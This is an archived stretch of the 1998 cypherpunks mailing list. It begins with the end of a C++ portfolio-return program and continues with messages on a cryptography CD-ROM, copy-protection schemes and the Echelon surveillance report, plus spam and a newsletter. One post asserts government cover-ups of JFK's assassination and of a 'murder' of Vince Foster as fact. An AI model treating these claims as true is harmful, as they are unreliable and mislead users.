 
void Portfolio::Invest( Money theCash )
{
//cout << "investing " << theCash << endl;
 
   if( NumShares != 0 )
     {
       NumShares += theCash/EquityPerShare();
       Cash += theCash;
     }
   else
     {
       Cash = theCash;
       NumShares = Cash;
     }
}
 
 
void Portfolio::Withdraw( Money Amount )
{
   Invest( -Amount );
}
 
void Portfolio::Fee( Money Amount )
{
   Cash -= Amount;
}
 
int Portfolio::FindStock( const StockTicker Ticker )
{
  for( int i = 0; i < NumberStocks; i++ )
    if( !strcmp( Ticker, Stocks[i]->GetTicker() ) )
      {
        return i;
        break;
      }
  return -1;
}
 
void Portfolio::Purchase( const StockTicker Ticker,
                          int Quantity,
                          Money Value )
{
   int found = FindStock( Ticker );
 
   if( found == -1 ) // need to add a stock
     {
       if( NumberStocks == MaxNumberStocks ) // need to resize
         {
            Stock ** NewStocks = new PStock[ MaxNumberStocks * 2 ];
            memcpy( NewStocks, Stocks, sizeof( Stock ) * MaxNumberStocks );
            delete[] Stocks;
            Stocks = NewStocks;
            MaxNumberStocks *= 2;
         }
       found = NumberStocks++;
       Stocks[found] = new Stock( Ticker, Quantity, Value );
     }
   else
     {
        Stocks[found]->Purchase( Quantity );
        Stocks[found]->SetValue( Value );
     }
 
   Cash -= Quantity * Value;
}
 
int Portfolio::Dividend( const StockTicker Ticker, Money DividendPerShare )
{
  int found = FindStock( Ticker );
 
  if( found == -1 )
     return 0;
 
  Cash += DividendPerShare * Stocks[found]->GetQuantity();
}
 
int Portfolio::Split( const StockTicker Ticker, Money Factor )
{
  int found = FindStock( Ticker );
 
  if( found == -1 )
     return 0;
 
  Stocks[found]->Split( Factor );
}
 
 
int Portfolio::Valuation( StockTicker Ticker, Money theValue )
{
  int found = FindStock( Ticker );
  if( found == -1 )
     return 0; // failure
 
  Stocks[found]->SetValue( theValue );
 
  return 1; // success
}
 
 
Money Portfolio::Equity( void ) const
{
   Money e = Cash;
 
   for( int i =0; i < NumberStocks; i++ )
      e += Stocks[i]->GetQuantity() * Stocks[i]->GetValue();
 
   return e ;
}
 
void Portfolio::Print( ostream & os, const char * comment )
{
  os << endl << "Portfolio: " << (comment ? comment : "" ) << endl;
 
  for( int i = 0; i < NumberStocks; i++ )
     os << Stocks[i]->GetTicker() << " "
        << Stocks[i]->GetQuantity() << " "
        << Stocks[i]->GetValue() << ", Total = "
        << Stocks[i]->GetValue() * Stocks[i]->GetQuantity() << endl;
  os << "Cash: " << Cash << endl;
 
  cout << "Equity = " << Equity() << endl;
  cout << "Number of Shares = " << GetNumShares() << endl;
  cout << "Share Value = " << EquityPerShare() << endl;
}
 
void ReadHistory( Portfolio & portfolio, FILE * f )
{
   while( !feof( f ) )
     {
        char buf[2048];
        buf[0] = 0;
        fgets( buf, sizeof( buf ), f );
 
        //cout << buf;
        char * p = strchr( buf, '#' );
        if( p != 0 ) *p = 0;  // Comment #
 
        for( p = buf; *p; p++ ) *p = toupper( *p );
 
        if( !strncmp( buf, "INV", 3 ) )
         {
            //cout << "investing" << endl;
 
            float amount;
            if( sscanf( buf+4, "%f", &amount ) == 1 )
               portfolio.Invest( amount );
            else
               fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "WDR", 3 ) )
         {
            float amount;
            if( sscanf( buf+4, "%f", &amount ) == 1 )
               portfolio.Invest( -amount );
            else
               fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "PUR", 3 ) )
         {
            float price;
            int numshares;
            char ticker[2048];
 
            if( sscanf( buf+4, "%s %d %f", &ticker, &numshares, &price ) == 3 )
              portfolio.Purchase( ticker, numshares, price );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "FEE", 3 ) )
         {
            float amount;
 
            if( sscanf( buf+4, "%f", &amount ) == 1 )
              portfolio.Fee( amount );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "SAL", 3 ) )
         {
            float price;
            int numshares;
            char ticker[2048];
 
            if( sscanf( buf+4, "%s %d %f", &ticker, &numshares, &price ) == 3 )
              portfolio.Purchase( ticker, -numshares, price );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "DIV", 3 ) )
         {
            float div;
            char ticker[2048];
            if( sscanf( buf+4, "%s %f", &ticker, &div ) == 2 )
              portfolio.Dividend( ticker, div );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "VAL", 3 ) )
         {
            float val;
            char ticker[2048];
            if( sscanf( buf+4, "%s %f", &ticker, &val ) == 2 )
              portfolio.Valuation( ticker, val );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "SPL", 3 ) )
         {
            float factor;
            char ticker[2048];
            if( sscanf( buf+4, "%s %f", &ticker, &factor ) == 2 )
              portfolio.Split( ticker, factor );
            else
              fprintf( stderr, "Invalid transaction: %s\n", buf );
         }
        else if( !strncmp( buf, "PRN", 3 ) )
         {
              portfolio.Print( cout, buf + 4 );
         }
     }
}
 
int main( int argc, char *argv[] )
{
   Portfolio portfolio;
 
   FILE * input;
   if( argc >= 2 )
   {
      if( (input = fopen( argv[1], "r" )) == 0 )
      {
         fprintf( stderr, "Can't open %s.\n"
               "Usage: %s activity-file TICK=val TICK1=val ...\n",
               argv[1], argv[0] );
         exit( 1 );
      }
   }
   else
   {
      input = stdin;
   }

   ReadHistory( portfolio, input );
 
   for( argc--; argc > 1; argc-- )
      // process arguments of form "TICKER=value"
     {
       char buf[ 2048 ];
       strcpy( buf, argv[argc] );

       for( char * p = buf; *p; p++ ) *p = toupper( *p );
 
       char * pvalue = strchr( buf, '=' );
 
       if( pvalue == 0 )
         {
           cerr << "Wrong argument: " << argv[argc]
                << ". Must be of form TICKER=value" << endl;
           continue;
         }
 
       *pvalue++=0;
 
       float value;
 
       if( sscanf( pvalue, "%f", &value ) != 1 )
       {
          cerr << "Wrong argument: " << argv[argc]
               << ". Must be of form TICKER=value" << endl;
          continue;
       }
 
       if( !portfolio.Valuation( buf, value ) )
       {
          cerr << "Ticker " << buf << " not found in the portfolio!" << endl;
       }
     }
 
   portfolio.Print( cout, "Final Result" );
 
   printf( "\n\n"
"Copyright (C) Igor Chudov, ichudov@algebra.com,\n"
"	http://www.algebra.com/~ichudov\n\n"
"No warranty is provided with this free program. GNU Copyright applies.\n" );

}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Trei <trei@ziplink.net>
Date: Mon, 23 Feb 1998 19:57:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: DDJ Crypto CD has arrived!
Message-ID: <34F252DA.652A@ziplink.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, it's finally here.

Frankly, I'm a little disapointed with the presentation. It's based
around a program called Hyper Reader, from Intergaid. This seems a bit
out of date - the copyright runs from 1987-1994. While this may have
been driven by a desire to support Win 3.1 without extra software, an
HTML based approach would have been my preference.

I've encountered a few minor bugs in the few minutes I've played with
it; not all of the buttons work properly, and the color maps go to hell
when the program's window is not selected.

While the book data is stored in some proprietary format with an *.hw4
extension, chapters can be easily exported to flat text files. They
can also be exported in WP format, but diagrams don't seem to come
out (at least when I export them to MS Word) - figures seem to 
be scanned bitmaps from the books.

Here's the copyright data, which lists the books present:


>Applied Cryptography, Cryptographic Protocols, and Computer Security >Models by Richard Demillo. Copyright 1983, American Mathematical >Society. All rights reserved.

>Applied Cryptography: Protocols, Algorithms, and Source Code in C, >Second Edition, by Bruce Schneier. Copyright  1995, John Wiley & Sons, >Inc. All rights reserved.

>Contemporary Cryptology: The Science of Information Integrity, edited >by Gustavus J. Simmons, Copyright  1992, IEEE. All rights reserved. No >part of this book may be reproduced or transmitted in any form or by >any means, electronic or mechanical, including photocopying, recording >or by any information storage and retrieval system, without permission >in writing from the IEEE.

>Cryptography and Data Security by Dorothy Denning. Copyright 1982, >Addison-Wesley Publishing Co., Inc. All rights reserved. No part of >this book may be reproduced or transmitted in any form or by any means, >electronic or mechanical, including photocopying, recording, or by any >information storage and retrieval system, without permission in writing >from Addison-Wesley Longman, Inc. Use of this licensed CD-ROM version >is subject to the terms of the individual, noncommercial license >granted the purchaser of this CD-ROM version.

>Cryptography: A New Dimension in Computer Data Security, by Carl Meyer. >Copyright 1982, John Wiley &Sons. All rights reserved.

>Cryptography: Theory and Practice, by Douglas Stinson., Copyright 1995, >CRC Press. All rights reserved.

>Handbook of Applied Cryptography, by Paul C. Van Oorschot, Scott A. >Vanstone, and Alfred Menezes. Copyright 1996, CRC Press. All rights >reserved.

>Military Cryptanalysis, Volume I, by William Friedman, Aegean Park >Press. All rights reserved
> Military Cryptanalysis, Volumes II, by William Friedman, Aegean Park >Press. All rights reserved. 
>Military Cryptanalysis, Volumes III, by William Friedman, Aegean Park >Press. All rights reserved. 
>Military Cryptanalysis, Volumes IV, by William Friedman, Aegean Park >Press. All rights reserved.

>"RSA Laboratories FAQ on Cryptography," "RSA Laboratories Technical >Reports," "RSA Laboratories Security Bulletins," and "CrytoBytes >Newsletter" Copyright 1997 RSA Data Security, Inc. All rights >reserved.

For those wondering: Applied Cryptography includes the source code
appendix. I have not checked if it has the 5th printing corrections.


Peter Trei
ptrei@securitydynamics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Betty G.O'Hearn" <betty@infowar.com>
Date: Mon, 23 Feb 1998 20:56:26 -0800 (PST)
To: JOEL@infowar.com
Subject: IRC CHAT  Terrorism and Desert Thunder
Message-ID: <3.0.3.32.19980223235855.02f99cd0@mail.infowar.com>
MIME-Version: 1.0
Content-Type: text/enriched


Come join us and chat with Clark Staten, 
Senior Analyst, Emergency Response & Research Institute


Date:  Tuesday, February 24, 1998

Time:  7:30 pm  EST, 6:30 pm CST, 5:30pm MST, and 4:30pm PST  (US)

Topic:  "Terrorism and Desert Thunder"



If you're interested in attending, please reply with a request for a password and instructions to enter the chat room.  





Betty O'Hearn
Assistant to Mr. Winn Schwartau
813-360-6256 Voice
813-363-7277 FAX
http://www.infowar.com
http://www.info-sec.com

"Air Power is an unusually seductive form of military strength because, like modern courtship, it appears to offer the pleasures of gratification without the burdens of commitment."   Eliot A. Cohen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 24 Feb 1998 03:04:15 -0800 (PST)
To: sunder <sunder@brainlink.com>
Subject: Re: Five industry giants propose encryption plan to protect Hollywood
In-Reply-To: <34F21246.7B6B00A8@brainlink.com>
Message-ID: <199802241137.GAA12838@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3989.1071713780.multipart/signed"

--Boundary..3989.1071713780.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <34F21246.7B6B00A8@brainlink.com>, on 02/23/98 
   at 07:20 PM, sunder <sunder@brainlink.com> said:

>Oh please.  You could always (for computers anyway) write your own
>drivers for video cards and sound cards that not only display stuff, but
>also save it to a hard drive as it's being recieved.  Whoop!

Well sitting down and writting a device driver is above and beyond the
ability of the average WinBlows user. More than likely it is above and
beyond the average "programmer" (ASM what's that??). M$ is already playing
around with using crypto and only allowing signed programs to run under
their OS (Crypto API, Active-X) it is not hard to imagine that they could
have the new version of their OS only allow device drivers that have been
approved and signed by microsoft (when you control +90% of the market you
can get away with silly shit like this).


> >   >   Date: Thu, 19 Feb 1998 11:13:50 -0800 (PST)
>> >   >   From: William Knowles <erehwon@dis.org>
>> >   >
>> >   >   BURBANK, Calif. (February 19, 1998 09:06 a.m. EST
>> >   >   http://www.nando.net) -- Five computer and electronics industry
>> >giants
>> >   >   have agreed on a strategy to prevent people from illegally copying
>> >   >   digital movies and music, the Los Angeles Times reported Thursday.
>> >   >
>> >   >   According to the proposal, high-definition TV sets, personal

>> Well I have gone over this in previous posts that right's management
>> woun't work against the bootlegers as at some time you have to display the
>> raw data to the user. what it will to is make things that much harder for
>> the average user.

>Exactly, it will probably require the average user to get involved in
>weird type in the 5th word of the 6th paragraph on page 60 in volume 6 of
>your  book and your ssn and your 3rd daughter's birth hour to display. 
>But once displayed... it's yours.  Shit, things like Lotus ScreenCam can
>grab anything displayed on screen.

Yes but I wouldn't want to use ScreenCam to copy a 100 page document. My
point was it would not make it impossible to copy the data just that it
would raise the "threshold of pain" above what the average user is willing
to endure.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: OS/2, Windows/0


--Boundary..3989.1071713780.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlBLYlY0OUNvMW4rYUxoaEFRRllDQVAvVnBs
NkdFeDAyOEM0Q2FqdnBVUHF6U0pzVlBFeGcyaWIKanAvcEVYbG5EM1dMTHky
c204aSsycXl5WVQvSm5rQzBIUW42K3J3Wlo1MWNWeDBkemMvbEw2Zm40dXBW
WDJvWApiSnZheU1MRTdyejdBVzA2My9VZi92cWZiTEdIQjd4Q2I2MHU2SFFS
bG1oQ0ZVL05OTmZNM3VvSnplNVVDRkM1CmNvdS9sVE5VVHFBPQo9MUVMdQot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3989.1071713780.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Butler" <wrb@hotmail.com>
Date: Tue, 24 Feb 1998 05:28:42 -0800 (PST)
To: celeste@seeme.com
Subject: Re: Valentine Suprise
Message-ID: <19980224132805.19244.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


FUCK-OFF!!!!!!!!!!!!!!!!
************************

----Original Message Follows----
From: celeste@seeme.net
Date: Mon, 23 Feb 1998 17:57:41 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Valentine Suprise
Reply-To: celeste@seeme.com


Me and my friends are so lonely!! 
I wish that you would come and see me. 
With Valentines day coming I don't want to be alone. 
I will do anything to make you happy, 
if you want me to I'll even invite a friend over to join us.  
Just PLEASE don't let me be alone!  
I'll be awaiting for you every night.
I'll be at: http://www.cyber-fantasy.com/



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wowcom@ctia.org" <wowcom@ctia.org>
Date: Fri, 27 Feb 1998 14:30:14 -0800 (PST)
To: broadcast@nmpinc.com
Subject: WOW-COM News Update
Message-ID: <34F2A7B8.5CD9EAE7@ctia.org>
MIME-Version: 1.0
Content-Type: text/plain


======================================================
 This update is sponsored by Hughes Network Systems
 http://www.hns.com/2CAREERS/careerMain.html

 ======================================================
 WOW-COM named a "TOP WEBSITE" by Mobile Computing & Communications
 Magazine (2/98)

 Dear WOW-COM Reader:

 WOW-COM(TM) is the wireless industry's online information source, a
 free service of CTIA.  The world of wireless is in constant motion.
 Stay on top of the news  and benefit from CTIA's analysis by reading
http://www.wow-com.com  everyday.

 INDEX:
 ======
 1) LARGEST WIRELESS INDUSTRY SHOW, WIRELESS 98, BEGAN TODAY IN ATLANTA,

GA.

 2) CTIA AGAIN CALLS ON FCC TO TAKE ACTION ON WIRETAP STANDARDS

 3)  CTIA ASKS FCC FOR IMPROVEMENTS IN ENHANCED 9-1-1 RULES


 **WIRELESS JOB OPPORTUNITY OF THE WEEK***********

 http://www.hns.com/2CAREERS/careerMain.html

 Company:   Hughes Network Systems
 Job Title: Senior Digital Design Engineer - Hardware
 Location:  Germantown, MD - US
 Job Description:   Lead digital design engineer for satellite
 baseband communications hardware.  Position requires experience in
 design of digital communications subsystems such as modulators,
 demodulators, digital filters, NCOs and FEC encoders/decoders.
 Requires BSEE (MSEE preferred) and 7-10 years of digital design
 experience with emphasis on communication circuit design.

 **********************************************************************

 WIRELESS 98 TO BEGIN NEXT WEEK IN ATLANTA
 ==========================================================


 http://www.wow-com.com/professional/convention/

 CTIA's WIRELESS 98 is breaking all records.  Sessions at the largest,
 global wireless convention feature hot topics and top industry
 speakers.  On February 23-25, join the largest gathering of analysts,
 CEO's, equipment suppliers, hardware manufacturers, network operators,
 retailers, regulators, software developers and venture capitalists
from around the world for the most comprehensive wireless
 telecommunications exposition - - WIRELESS 98. It's only 6 days away!
 Don't miss it!

CTIA AGAIN CALLS ON FCC TO TAKE ACTION ON WIRETAP STANDARDS
 =========================================================

 http://www.wow-com.com/professional/WirelessDigest/

 The Cellular Telecommunications Industry Association has filed
 comments with the Federal Communications Commission again asking
 that it take several steps in regard to implementation of the federal
 Communications Assistance for Law Enforcement Act. CTIA points
 out that the telecommunications industry has moved forward
 towards timely implementation of the Act, but that the law enforcement
 community, represented by the Federal Bureau of Investigation, has
continued to delay the process.  Read it here.  Simply click above for
full text.


 CTIA ASKS FCC FOR IMPROVEMENTS IN ENHANCED 9-1-1 RULES
 ==========================================================
 http://www.wow-com.com/results/professional/news/index.cfm

 "Enhanced 9-1-1" will provide the next generation of emergency
 services for wireless phone users.  The basic outline for Enhanced
 9-1-1 services was developed jointly by the public safety
 communications community and CTIA.  In a petition filed yesterday,
 CTIA points out that the FCC should improve wireless emergency calls
 throughout the United States.  To learn more about CTIA's petition and
 other implementation issues regarding 9-1-1 please click above.


 =============================
 MORE WOW-COM(TM) FEATURES
 =============================
 WOW-COM(TM) is current: Routine Updates throughout the business day
 WOW-COM(TM) is insightful: CTIA's unbiased analysis
 WOW-COM(TM) is beneficial: Find products and services in
 WOW-COM(TM)'s Virtual Trade Show.   List open positions
 in the WOW-COM(TM) Career Center, receive resumes via email
 and hire qualified individuals.

 ========================================================

 This update sponsored by: HUGHES NETWORK SYSTEMS
 http://www.hns.com/2CAREERS/careerMain.html

 Hughes Network Systems is one of the fastest-growing digital
 communications companies  in the world, providing world-class
wireless, satellite and broadcast  products to customers in  over 60
countries.  Today, HNS employs over 500 software engineers and
 200 hardware engineers dedicated to developing our products,
 services and systems from our Germantown, Maryland headquarters
 and San Diego, California facility.  To be part of the next HNS
 breakthrough, visit our Web site:
http:// www.hns.com/2CAREERS/careerMain.html to explore the 100+
opportunities
 currently available.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Stone - McAfee Fulfillment <fulfill@mail.mcafee.com>
Date: Tue, 24 Feb 1998 07:35:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: McAfee Special Offer
Message-ID: <199802241531.HAA03776@mail.mcafee.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello again.

I know, I have already e-mailed you once.  But I wanted to follow up 
with you;  you visited our web site in the past and I responded to 
give us a call regarding our Special Pricing.  Your 30 day evaluation 
period has ended and by licensing VirusScan you can continue up-to-date
protection from the over 15,000 viruses including the 250 new viruses 
that appear each month alone!  Give us a call and we can set you up to 
continue your protection.  We can quote you a SPECIAL PRICE on VirusScan 
and even have a special 50% off offer for Nuts & Bolts which recovers 
lost drives and files, optimizes your pc, fixes glitches, and enables
your computer  to operate at peak speed!

Send sensitive information at work or over the net? - We now offer
PGP Encryption software to secure you data, ask us about it today!

This promotion is going to end on February 27th.   I would hate for you to 
miss out.  I'm not the only one at our phones here (800-338-8754 x2225), 
so if you already took us up on it, I'd like to add, "Thanks!!" and 
I hope you enjoy the product! 

This offer limited to USA & Canada

Sincerely,
Mike Stone
Mike_Stone@cc.mcafee.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 24 Feb 1998 06:04:12 -0800 (PST)
To: Alexandre Maret <amaret@infomaniak.ch>
Subject: Re: return.C -- performance tracking tool (fwd)
In-Reply-To: <34F2CF5D.8276D7FB@infomaniak.ch>
Message-ID: <199802241436.JAA14156@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3989.1071713780.multipart/signed"

--Boundary..3989.1071713780.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <34F2CF5D.8276D7FB@infomaniak.ch>, on 02/24/98 
   at 02:47 PM, Alexandre Maret <amaret@infomaniak.ch> said:

>Igor Chudov @ home wrote:
>> 
>> I have been using this program for a while and decided to share it
>> with the other readers. It is written in C++.

>this is not a financial mailing list.
>and this code is not C++... it just needs a C++ compiler to
>compile. real C++ code doesn't use fprintf, scanf, nor strcmp...

Let's not forget that *real* C++ apps are bloated several time that of
comparable C apps (god forbid anyone write some tight ASM code).

$1.00 <== Inflation

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: Get OS/2 - the best Windows tip around!


--Boundary..3989.1071713780.multipart/signed
Content-Type: application/octet-stream; name="pgp00002.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00002.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlBMRmJZOUNvMW4rYUxoaEFRSFE3Z1FBdEo4
UHYxVUlPSEJzMkJ4YWlvN21wRDNpWmVPZDN5WGMKNk4vc1k5ZCtZUDVvSnhZ
VG9QTkhzMitwclc4cDNlQ09FWjJwcWs5VmNReE56TUlNMExYc01LRFZ1NmMv
YXBTdApBMkhFYVZGd2tBU3FhMERwN3Nucm8rUEREd0FGSHFVMzhkNnVKWDZk
Vi9vQk9qWjIvZDMvT3ptVXZ3cC93RXVFCldOeno0SEE5Y0xzPQo9OU9BUwot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3989.1071713780.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Anthony" <canthony@info-nation.com>
Date: Tue, 24 Feb 1998 06:04:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: In todays CyberTimes--"European Study Paints a Chilling  Portrai
Message-ID: <199802241404.IAA16583@bitstream.net>
MIME-Version: 1.0
Content-Type: text/plain


FYI - In today's CyberTimes:


"European Study Paints a Chilling  Portrait of Technology's 
Uses"

By BRUNO GIUSSANI

" A massive telecommunications interception network
 operates within Europe and, according to a new
 study circulating on the Internet, "targets the telephone, 
fax   and e-mail messages of private citizens, politicians, 
trade unionists and companies alike." 


The article can be found at:

http://www.nytimes.com/library/cyber/euro/022498euro.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Butler" <wrb@hotmail.com>
Date: Tue, 24 Feb 1998 08:44:35 -0800 (PST)
To: melder@descartes.coker.edu
Subject: Re: Valentine Suprise
Message-ID: <19980224164402.8312.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes you are prob. right but I do get a little burned about it in my mail 
all the time.

----Original Message Follows----
Date: Tue, 24 Feb 1998 10:00:46 -0500
To: "William R. Butler" <wrb@hotmail.com>
From: Michael Elder <melder@descartes.coker.edu>
Subject: Re: Valentine Suprise
Cc: cypherpunks@toad.com,celeste@seeme.com

At 05:28 AM 2/24/98 PST, William R. Butler wrote:
>FUCK-OFF!!!!!!!!!!!!!!!!
>************************

...

>Me and my friends are so lonely!! 
>I wish that you would come and see me. 
>With Valentines day coming I don't want to be alone. 
>I will do anything to make you happy, 
>if you want me to I'll even invite a friend over to join us.  
>Just PLEASE don't let me be alone!  
>I'll be awaiting for you every night.
>I'll be at: http://www.cyber-fantasy.com/
>

I think that was the point of the advertisement d=]

-E.






______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 24 Feb 1998 07:27:09 -0800 (PST)
To: Information Security <guy@panix.com>
Subject: Re:  In todays CyberTimes--"European Study Paints a Chilling  Portrai
In-Reply-To: <199802241500.KAA14055@panix2.panix.com>
Message-ID: <199802241600.LAA14937@users.invweb.net>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3989.1071713780.multipart/signed"

--Boundary..3989.1071713780.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In <199802241500.KAA14055@panix2.panix.com>, on 02/24/98 
   at 10:00 AM, Information Security <guy@panix.com> said:

>   "The network, dubbed Echelon, is described in a new study
>    by the European Parliament titled

>       'An Appraisal of Technologies of Political Control.'" 


>It's high time Don Mclean (sic) or someone took the
>extensive documentation collected in the Cryptography
>Manifesto regarding this, which includes massive USA domestic spying, and
>started writing news stories about it, and
>get other news organizations interested in the questions
>raised. Questions to be put to Senators.

>Why?

>Because it is ECHELON, not pedophiles, not drug dealers,
>that is not only the hold-up for freely exportable
>software, but also for why the FBI has openly moved
>to regulate all domestic cryptography into oblivion.

>The story of massive spying is one "the American people"
>can understand. Cryptography is too distant.

>Go for it, someone, please.

The sheeple don't care.

The sheeple are well aware of the abuses of power by our government and
they don't care nor have they cared for a long time. So long as they have
a roof over their heads, cloths on their back, a color TV and their
microwave dinners they are willing to let the government do whatever they
want.

Where was the great outcry by the people when the government blatantly
covered up the assassination of JFK with the Warren Commission?

Where was the great outcry by the people with the numerous atrocities
committed by the FBI,CIA,BATF, ...?

Where was the great outcry by the people over the coverup of the murder of
Vince Foster?

Where was the great outcry by the people over the murder of innocent
children at Waco?

They just don't care and this report woun't be so much as a blip on the
radar screen. The Feds will just wrap this up in the cover of fighting the
four horsemen and it will be business as usual.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: Why look thru Windows? Open the door to the future: OS/2


--Boundary..3989.1071713780.multipart/signed
Content-Type: application/octet-stream; name="pgp00003.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00003.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zYS1z
aGExCkNvbW1lbnQ6IFJlZ2lzdGVyZWRfVXNlcl9FLVNlY3VyZV92MS4xYjFf
RVMwMDAwMDAKCmlRQ1ZBd1VBTlBMWkU0OUNvMW4rYUxoaEFRRS9aUVAvV3lX
aGtDbmRab1c0d3IwY2VZRnFubStkM210YnRhYSsKWVZSVm5TTHlRNEJzTU1s
RHR0dXJFSDlMeGd5T0IvQ2Rsc2pqZVZJUHI5aE5qWW1RbnNlK3ZIYWowLytR
cUE1NApnN29qNkFhcUpWVjQzbWYweDVnRTkzSnN2MkNkVEx4ZEFQb08xdlM2
L3FqNEpaUnVFSCtZUkxjUTk3aFB1NWdECkpCK1hRbExldng0PQo9bzNITgot
LS0tLUVORCBQR1AgTUVTU0FHRS0tLS0t
--Boundary..3989.1071713780.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Elder <melder@descartes.coker.edu>
Date: Tue, 24 Feb 1998 07:03:00 -0800 (PST)
To: trei@ziplink.net
Subject: Re: DDJ Crypto CD has arrived!
In-Reply-To: <34F252DA.652A@ziplink.net>
Message-ID: <3.0.5.32.19980224095821.007c1940@descartes.coker.edu>
MIME-Version: 1.0
Content-Type: text/plain


trei@ziplink.net wrote:

>>Applied Cryptography: Protocols, Algorithms, and Source Code in C,
>Second Edition, by Bruce Schneier. Copyright  1995, John Wiley & Sons,
>Inc. All rights reserved.
>For those wondering: Applied Cryptography includes the source code
>appendix. I have not checked if it has the 5th printing corrections.

Just a little note of interest, AC is currently in its sixth printing. I
just got it last week.

-E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 24 Feb 1998 07:00:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:  In todays CyberTimes--"European Study Paints a Chilling  Portrai
Message-ID: <199802241500.KAA14055@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


   >   From: "Charles Anthony" <canthony@info-nation.com>
   >   The article can be found at:
   >
   >   http://www.nytimes.com/library/cyber/euro/022498euro.html

   "The network, dubbed Echelon, is described in a new study
    by the European Parliament titled

       'An Appraisal of Technologies of Political Control.'" 


It's high time Don Mclean (sic) or someone took the
extensive documentation collected in the Cryptography
Manifesto regarding this, which includes massive USA domestic
spying, and started writing news stories about it, and
get other news organizations interested in the questions
raised. Questions to be put to Senators.

Why?

Because it is ECHELON, not pedophiles, not drug dealers,
that is not only the hold-up for freely exportable
software, but also for why the FBI has openly moved
to regulate all domestic cryptography into oblivion.

The story of massive spying is one "the American people"
can understand. Cryptography is too distant.

Go for it, someone, please.
---guy

   No one listens to me.




